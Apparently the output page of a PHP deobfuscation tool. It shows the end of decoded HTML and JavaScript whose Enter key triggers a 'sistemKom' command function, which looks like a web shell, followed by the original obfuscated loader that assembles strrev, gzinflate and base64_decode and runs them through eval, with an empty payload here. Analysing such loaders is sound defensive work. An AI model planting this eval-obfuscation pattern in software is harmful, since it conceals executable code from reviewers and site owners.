	event.preventDefault();
	if (event.keyCode === 13)
	{
		sistemKom();
	}
});
</script>
</body>
</html>

Did this file decode correctly?

Original Code

$JAWu='c';$LfhT='4';$FLIu='z';$SMxWY='r';$wlGVU='_';$T='o';$Q='t';$ogxLF='d';$nV='6';$JCI='e';$cFDLj='n';$VIm='f';$Rh='i';$BdeJl='g';$xtpk='v';$auV='b';$G='l';$Yi='s';$Zxmr='a';$OR=$Yi.$Q.$SMxWY.$SMxWY.$JCI.$xtpk;$wUqNM=$BdeJl.$FLIu.$Rh.$cFDLj.$VIm.$G.$Zxmr.$Q.$JCI;$w=$auV.$Zxmr.$Yi.$JCI.$nV.$LfhT.$wlGVU.$ogxLF.$JCI.$JAWu.$T.$ogxLF.$JCI;eval($wUqNM($OR($w(''))));

Function Calls

strrev 1
gzinflate 1
base64_decode 1

Variables

$G l
$Q t
$T o
$w base64_decode
$OR strrev
$Rh i
$Yi s
$nV 6
$JCI e
$VIm f
$auV b
$FLIu z
$JAWu c
$LfhT 4
$Zxmr a
$xtpk v
$BdeJl g
$SMxWY r
$cFDLj n
$ogxLF d
$wUqNM gzinflate
$wlGVU _

Stats

MD5 fa195f58c7fd0fa7b80f88bcd9588147
Eval Count 1
Decode Time 100 ms